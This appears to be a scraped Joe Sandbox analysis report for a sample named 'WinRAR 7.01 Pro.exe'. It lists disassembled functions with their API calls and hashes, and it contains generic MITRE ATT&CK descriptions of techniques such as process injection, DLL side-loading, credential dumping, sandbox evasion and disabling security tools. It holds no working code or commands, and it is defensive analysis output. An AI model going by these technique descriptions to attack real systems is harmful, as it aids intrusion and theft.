Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6764deb9eb99faf6f2fa29ccd02732ebdc0cb7aea93fab3ddd3bfba10ef26be6
Instruction ID: 391c362ead836007ca00d615de484d316ff2c5f5b1b4c14b3bb1447c9391c4be
Opcode Fuzzy Hash: 6764deb9eb99faf6f2fa29ccd02732ebdc0cb7aea93fab3ddd3bfba10ef26be6
Instruction Fuzzy Hash: 8191B332F1865185F770AF65A442ABD6BA0BB66B8AF144179DECEB7685CF3CD442C300

Function 00007FF6C3BA13D8 Relevance: 6.1, APIs: 4, Instructions: 144filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF6C3BA14A8
CreateFileW.KERNEL32 ref: 00007FF6C3BA1506
SetFileTime.KERNEL32 ref: 00007FF6C3BA158F
CloseHandle.KERNEL32 ref: 00007FF6C3BA159A

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: b06a088d228a07a3e749a8d415f4d176d172e55972da0638a338fa7bc1e0ff5e
Instruction ID: cfb99365dc1f5e5ec8804747f2ee9b69c41033754ab067b6432b0aacb7f98e9b
Opcode Fuzzy Hash: b06a088d228a07a3e749a8d415f4d176d172e55972da0638a338fa7bc1e0ff5e
Instruction Fuzzy Hash: FD510922B08A4245F9A0DF25E512BBA67A0AFE37E6F440131EDDE977DADE3CD4058740

Function 00007FF6C3BA3F2C Relevance: 6.1, APIs: 4, Instructions: 127COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF6C3BA3F78
GetFullPathNameW.KERNEL32 ref: 00007FF6C3BA3FB4

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: FullNamePath
String ID:
API String ID: 608056474-0
Opcode ID: bc269fee4e50a1ee74e2711acd90c84bb1ed9af7c8df65560ead03289f62de64
Instruction ID: f6a67462ecef310bf8c59e5c0a8d9c935d77d8efd86024aa4ceafcbe06d5bf63
Opcode Fuzzy Hash: bc269fee4e50a1ee74e2711acd90c84bb1ed9af7c8df65560ead03289f62de64
Instruction Fuzzy Hash: 62417815F18A0294FB10EFA1D8539FD6370AFB2786B544035DDDDE7A9AEE2CE8069340

Function 00007FF6C3BB1BB4 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6C3BB1BBC
GetDeviceCaps.GDI32 ref: 00007FF6C3BB1BD2
GetDeviceCaps.GDI32 ref: 00007FF6C3BB1BE6
ReleaseDC.USER32 ref: 00007FF6C3BB1BF7

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 063c2fcded254c65569d10fc533311c424a852e6975ab1428a992d71ab73b3cc
Instruction ID: 703d2884cbb0a2c3d5bcb37da16c64de00014e67dbce369a4c14868e0bfe6acf
Opcode Fuzzy Hash: 063c2fcded254c65569d10fc533311c424a852e6975ab1428a992d71ab73b3cc
Instruction Fuzzy Hash: 19E01268F09B0247EF1C6F7AA85A9757390AF6E743F045039C8DEE6350DE3DA1894B40

Function 00007FF6C3BBE518 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6C3BBE542

Strings

csm, xrefs: 00007FF6C3BBE567
csm, xrefs: 00007FF6C3BBE6D6

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: ee578b2482a540c51527f164a6e0fed1b565d6d81eec71688779eae399c326ed
Instruction ID: 48f16123a5dc3c577298bf073a88661e199cf00191825eb800b7b13227a59426
Opcode Fuzzy Hash: ee578b2482a540c51527f164a6e0fed1b565d6d81eec71688779eae399c326ed
Instruction Fuzzy Hash: D471E57250868186DB618F26E081B7D7BA0FB66B8EF188131EECDAB695DF3CD451C740

Function 00007FF6C3BBEB50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6C3BBEBFA
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF6C3BBEC26

Strings

csm, xrefs: 00007FF6C3BBED26

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 6172443f4aac5bc55d05b3391ceaf8516a59a20f4413852be442e068f4ee1a28
Instruction ID: 15f21c86e9751a777b03c082769ebb70e19e771bbc8bf8678c5a934ae46dd998
Opcode Fuzzy Hash: 6172443f4aac5bc55d05b3391ceaf8516a59a20f4413852be442e068f4ee1a28
Instruction Fuzzy Hash: 2251917661874187E660EF16E482A6E77A4FB9ABA5F000134EBCD9BB55CF3CE450CB40

Function 00007FF6C3BCF5D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6C3BCF6E7
GetLastError.KERNEL32 ref: 00007FF6C3BCF709

Strings

U, xrefs: 00007FF6C3BCF693

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: f32195ae518fd65f4f3b1012928870cbf467e7821a135e261eae2b4b3a68d128
Instruction ID: b805c400260e131f80c843456c1e4aa76e2f250a05bd1a0788e51e0b0907aac0
Opcode Fuzzy Hash: f32195ae518fd65f4f3b1012928870cbf467e7821a135e261eae2b4b3a68d128
Instruction Fuzzy Hash: B441B022A18A4182DB20DF25F8457A977A0FBA9785F504031EECDD7798EF3CD441CB40

Function 00007FF6C3BB1A7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6C3BB1AA5
ReleaseDC.USER32 ref: 00007FF6C3BB1B87

Strings

, xrefs: 00007FF6C3BB1B1F

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Release
String ID:
API String ID: 1375353473-3916222277
Opcode ID: 63c5ebe95d055cc5ab24ee0dc664498dd510615dc332dc8ef352fedcd7013a9f
Instruction ID: 311708b6e6897f6c8a9348345c2820e3347e2c2eb773bf81df6da267dea61386
Opcode Fuzzy Hash: 63c5ebe95d055cc5ab24ee0dc664498dd510615dc332dc8ef352fedcd7013a9f
Instruction Fuzzy Hash: E0311C3A60874187DA089F26B819A2AB761F79AFD2F405035DD8A93754CF3CD449CB04

Function 00007FF6C3BA8864 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C3BA85E8: GetProcAddress.KERNEL32(?,?,00000000,00007FF6C3BA88A4), ref: 00007FF6C3BA8615
Part of subcall function 00007FF6C3BA85E8: GetProcAddress.KERNEL32(?,?,00000000,00007FF6C3BA88A4), ref: 00007FF6C3BA8629

GetCurrentProcessId.KERNEL32 ref: 00007FF6C3BA8919

Strings

CryptProtectMemory failed, xrefs: 00007FF6C3BA88CC
CryptUnprotectMemory failed, xrefs: 00007FF6C3BA8910

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 6d8220386a921977bc83dee32e9001b82bf0fdd35c8ad8174e51ed78770c5b4e
Instruction ID: 6ae7da72f1f41857684a4fd7e6b81573166caaaa63bb5c51b26f6139e7a86bd2
Opcode Fuzzy Hash: 6d8220386a921977bc83dee32e9001b82bf0fdd35c8ad8174e51ed78770c5b4e
Instruction Fuzzy Hash: 0021A320A0DF4280FA508F15A8829796B60FF76B96F491235D9DDE3BD4DE3CE506C301

Function 00007FF6C3BAB0A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 00007FF6C3BAB109
CreateEventW.KERNEL32 ref: 00007FF6C3BAB122

Strings

Thread pool initialization failed., xrefs: 00007FF6C3BAB142

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Create$EventSemaphore
String ID: Thread pool initialization failed.
API String ID: 3431467744-2182114853
Opcode ID: cf7e847ec42c39c98afed13f61a8aa811440edc33cdc0335b4f5739e4f6cac58
Instruction ID: b45fa12b8ef2d1f48410152c9d85b4e2926d7ab754f4e633972a92e3479f0d99
Opcode Fuzzy Hash: cf7e847ec42c39c98afed13f61a8aa811440edc33cdc0335b4f5739e4f6cac58
Instruction Fuzzy Hash: 45210732B19B4286F718CF25E151BA973A2FBA5706F148034C7ED87285CF7EA065CB40

Function 00007FF6C3BBC3D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3B924E7), ref: 00007FF6C3BBC41C
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3B924E7), ref: 00007FF6C3BBC462

Strings

csm, xrefs: 00007FF6C3BBC44F

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: c03d251433d90376995db402b47a83d553daa412ff273ed7f441ff3744a3506c
Instruction ID: 4c824cfd689b049484f2b3a5e0d51d4ca6be22ea49978a4e87e48592e132d2ab
Opcode Fuzzy Hash: c03d251433d90376995db402b47a83d553daa412ff273ed7f441ff3744a3506c
Instruction Fuzzy Hash: 1B116A32608B8182EB208F15F481669BBA4FBD9B99F584230DECD5BB68DF3CD5518B00

Function 00007FF6C3BAAFF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,?,?,00007FF6C3BAB43D), ref: 00007FF6C3BAAFF7
GetLastError.KERNEL32(?,?,?,?,00007FF6C3BAB43D), ref: 00007FF6C3BAB002

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF6C3BAB00C

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1211598281-2248577382
Opcode ID: 9928445313413648c54120f2c83774c4f876eb100ab0f055dbd8e3c4ab5f68aa
Instruction ID: 7d7df563be117dc559dc7bf36209fc522aba1017c53f3c5156a45f9a83ddfe3a
Opcode Fuzzy Hash: 9928445313413648c54120f2c83774c4f876eb100ab0f055dbd8e3c4ab5f68aa
Instruction Fuzzy Hash: 5CE01261E28A0281F600AF35AC939B42221AF737B2F905330E0FDE15E59F6CA64A8740

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WinRAR 7.01 Pro.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

